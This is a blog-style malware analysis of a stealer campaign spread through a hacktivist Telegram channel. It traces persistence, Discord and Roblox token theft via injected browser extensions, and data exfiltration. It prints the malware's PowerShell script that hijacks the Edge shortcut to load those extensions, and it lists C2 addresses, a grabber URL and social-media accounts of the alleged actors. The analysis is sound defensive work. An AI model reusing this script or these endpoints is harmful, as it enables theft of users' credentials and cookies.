Uncovering a Palestinian & French Stealer Campaign
An interesting file was dropped in a Telegram channel I was apart of with the message “i will be using my private stealer for #opisrael, message me to help it spread”. This blog shows the world of Stealer-as-a-Service markets, and political hacktivism within Telegram against Israel, and a very noisy piece of malware!
The Start:
As someone who is very interested in the latest hacking news/malware techniques/threat intelligence/etc, I am in a lot of “underground” Telegram channels, and sometimes, I will come across a new unique malware sample or someone will try and social engineer me into installing malware like my Reversing a “Game Cheat” Blog
In this case, it was in the “ℭ0𝔡3𝔅𝔯34𝔨3𝔯𝔰 ANONYMOUS” (meaning CODEBREAKERS ANONYMOUS) channel (I know, leave ‘em be.. they’re having fun) where one of their “leaders” known as “𝐒𝐡𝐚𝐫𝐢𝐟𝐟” posted a gofile.io
link to a malicious stealer with the caption: “i will be using my private stealer for #opisrael, message me to help it spread”.
The “Threat Actor”
Shariff, the one who sent the file, is a TikTok “Threat Actor” (heavy emphasis on the quotes) who posts videos related to hacking and the “life” of being a hacker (I think, idk figure it out yourself lol: https://www.tiktok.com/@s.a.m.i.r_012 & Second account https://www.tiktok.com/@s.a.m.i.r_01)
He has a Yemen flag in his TikTok bio, so I believe he resides in Yemen and is supporting Palestine through the Israel v Palestine conflic by spreading malware to any Israeli citizens.
He also has a few other friends that post in the same Telegram channel and they like to post the same type of stuff, in case you wanted some more entertainment: https://www.tiktok.com/@ii.clappz/video/7300147463090998535 & https://www.tiktok.com/@yoozy_1337/video/7295312479641505030
My point I’m trying to prove is we are not dealing with an APT here. But I personally think it is interesting to see what these foreign “hacktivists” are up to, what malware they are using, and who they are working with.
The File, named 321chat.exe
:
- 32-bit Executable
- MD5 Hash:
4aec2a150e4135f61dff2e55de07b9e9
- File Description: “Usefull Application” (??? I thought this was funny)
- File is a Nullsoft Scriptable Install System (NSIS) type file
I don’t really know where to start with this malware, it is a stealer malware first of all, but not one that I have seen before. The hash has never been uploaded to VirusTotal and it is Fully Undetected: https://www.virustotal.com/gui/file/c7b11a2b9719590183eb1985f61b7b5b11b8bdead56003c65279d9a7c47b728a
Some new, unique malware! Just asking to be analysed. Let’s get started.
ProcDot Analysis:
I used ProcDot to visualize the malware layout and how it executes, and from my analysis, the file executes multiple child processes of itself, the most interesting one being PID: 4320
This PID: 4320
directly creates a thread with ID: 6184
, this thread is used for creating the persistence registry keys, and creating other threads that are used for stealing the users information and creating the final ZIP file which is eventually sent to the C2.
^^^ TID: 6184
creating a persistent registry key ^^^
^^^ TID: 6184
creating 4 separate threads ready for writing the stolen information into a ZIP file that will be sent to the C2 ^^^
Using ProcDot, we can actually target specific child processes and see what they were doing, since we are focusing on the stealer malware, I will change the render configuration to only show threads and processes created by PID: 4320
TID-6184, Hawkish Grabber
After this specific TID is created, we can see some DLLs being loaded, some communications being made to some servers, one of them specifically stood out to me, 185.199.117.133:443
. The Child TIDs: 7068, 9708, 2984, and 7952
were being used to download a zip file called "extensions.zip"
. Eventually, TIDs: 7068 and 7952
both start reading data from the ZIP file then start writing data to the following folders:
C:\ProgramData\ChromeExtensionsNova\extension-cookies
C:\ProgramData\ChromeExtensionsNova\extension-tokens
These folders both contain .js files which are used to enumerate Discord account values and steal tokens and information:
^^^ background.js
script found inside C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\
^^^
The script also shows some information about the type of stealer that is being used:
As you can see, they have a Telegram: https://t.me/Sordeal
They also have a Discord server where they sell access to the stealer for anywhere from $5 for 1 month access to $70 for 24 months access
Furthermore they have a Sellix page where you can again buy the stealer, although the Sellix site is a lot cheaper lol:
28/11/2023 UPDATE
The selling page has changed to a Sellpass shop:
These guys are French, and are what makes the title of this blog, the “threat actors” like Clappz, Yoozy, and Samir, are all either from Yemen or support Palestine and want to attack Israel, and the French lads are the developers/owners of Nova Sentinel.
To prove this, since “YooZy” got a bit mad at me in Discord for this blog and first tried to claim that the Stealer wasnt Nova Sentinel, which he later backtracked on. He then tried to claim that nobody was French, and the “real” (whatever that means) Nova dev/owner isnt even in his own Discord/Telegram channels and also isnt French
So, I went and re-joined the Nova Discord server after leaving, and could see a couple videos posted by the “Owner”:
As you can see, he has the “Owner” role:
And lo and behold, we click on the Tutorial videos and can clearly see the Owner/person who recorded this video is indeed French
Furthermore, in their public Telegram channel where they post all the latest updates, they openly post in English and French, if this isnt enough proof to say “The creators or Nova Sentinel are French” then idk what is, they also charge everyone in Euros, the currency of France so yeah idk what YooZy’s talking about lol.
Anyways it looks like this one specifically is “Hawkish Grabber” considering the webhook_url
variable seen above. Not sure if “Nova Sentinel” and “Hawkish Grabber” are the same thing, or if they are different, but this piece of the malware is definitely grabbing user information/cookies/tokens.
The other folder, C:\ProgramData\ChromeExtensionsNova\extension-cookies
is a folder specifically targeting Roblox accounts and cookies, it then sends the data to the C2:
^^^ background.js
script found inside C:\ProgramData\ChromeExtensionsNova\extension-cookies\scripts\
^^^
After the ZIP file is completely unpacked, it is deleted:
Daddy TID 6184
then creates a new PS1 file called salutzasYm.ps1
This file has the following contents:
$WshShell = New-Object -comObject WScript.Shell;
$Shortcut = $WshShell.CreateShortcut("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk");
$Shortcut.Arguments = "--load-extension=C:\ProgramData\ChromeExtensionsNova\extension-cookies,C:\ProgramData\ChromeExtensionsNova\extension-tokens";
$Shortcut.Save()
This script is adding the extensions that were downloaded earlier into the default browser, once this is done, whenever the user opens their browser, it will auto redirect to Discord & Roblox and inject the cookie stealer which will steal the cookies and send it to the Hawkish Grabber API link seen earlier: https://hawkish.eu/grabber/nova/TkoCCyWOcryKWiOgbvNVgqBnekAvNhrIzrFdfPpknSHwnOQTqBxJWYDSkWhr
Then the TID 6184
makes another persistent registry key for cmd.exe
, probably to ensure the PS1 web injection script executes at startup.
Later on it also makes one for powershell.exe
Inbetween that, TID 6184
also writes some data to the System Info.txt
file
NOTE, just incase you’re confused with all the different TIDs being thrown around, TID 6184
is the main TID has been used for creating persistent registry keys, writing the stolen data to C:\Users\Analysis\AppData\Local\Temp\fMYoQic11EKsYaZdyub7
(the fMYoQic11EKsYaZdyub7
folder is randomly generated), and PID 4320
is the Parent Process that has created the Thread ID 6184
. Finally, the Child TIDs: 7068, 9708, 2984, and 7952
of which their Parent TID is 6184
, were being used to download a zip file called "extensions.zip"
. But they will soon be used to write all of the stolen information inside C:\Users\Analysis\AppData\Local\Temp\fMYoQic11EKsYaZdyub7
into a ZIP file called GB_NOVA_Analysis.zip
(My computer name is Analysis, so it would be GB_NOVA_<YOUR-COMPUTER-NAME>.zip
)
Here is the Process Hierarchy:
PID 4320
= Main stealer processTID 6184 "TID Daddy"
= Main thread created by stealer process to manage persistence and steal informationChild TIDs: 7068, 9708, 2984, and 7952
= Child Threads created by “TID Daddy” used to download + setup the web injector that steals Discord Tokens & Roblox Cookies, and finally pack all stolen data into theGB_NOVA_Analysis.zip
ZIP file.
After the persistence registry keys have been added, the stealer starts to enumerate the machine and write stolen information into the randomly generated folder in Temp (C:\Users\Analysis\AppData\Local\Temp\fMYoQic11EKsYaZdyub7)
, for example here below it is writing the stolen Discord information:
Though I dont have Discord on the VM, so it doesn’t log anything:
I managed to rip the folder from the Temp folder before it was Zipped up and sent to the C2 and deleted, this was the folder list:
It stole some information, nothing special, just a list of downloads and some dead cookies, but these txt files go to show that if i had any Credit Cards saved then they would be logged also:
To get a look at some of the logs, here is my stolen history information lol
(Yes, i was using Edge to download Firefox, what else do you use it for?)
It also steals system information, lists what applications are installed, and takes a screenshot of whatever is on the screen (will come back to this screenshotting function later). Along with this, it also steals Wi-Fi passwords because that is useful when you live nowhere near the victim. :)
The malware also uses the child TIDs to enumerate web data (downloads, history, cookies, etc) and login data from the installed browsers:
Here it is commanding TID 7068
to read the Web data file:
After reading the Microsoft Edge Web+Login data files. The malware switches targets to Firefox, since its the only other browser installed.
It then compiles all of this data into the Downloads.txt file, History.txt file, etc etc.
Once the malware is done compiling all stolen information into its Temporary randomly generated folder, it uses Child TIDs: 7068, 9708, 2984, and 7952
to pack it all into GB_NOVA_<YOUR-COMPUTER-NAME>.zip
. Below is a GIF of the process:
The main stealer process PID 4320
then sends the data to 163.5.121.96, 31.14.70.243, and 51.178.66.33
these are probably Telegram API’s or Discord webhooks. Below is another GIF of the process:
The malware also creates a file called (random characters)_temp.ps1
Which creates a image file which is a screenshot of whatever is on the screen at the time, and the computer name along with date, this file is also packed into C:\Users\Analysis\AppData\Local\Temp\fMYoQic11EKsYaZdyub7\System
Thats pretty much it
After i finished analysing the malware, i woke up the next day to some posts in the chat, which included my virtual machines stolen information lmao
Thats a wrap folks, if you want the malware, tough, its 70MB and Github only lets me upload 25MB max.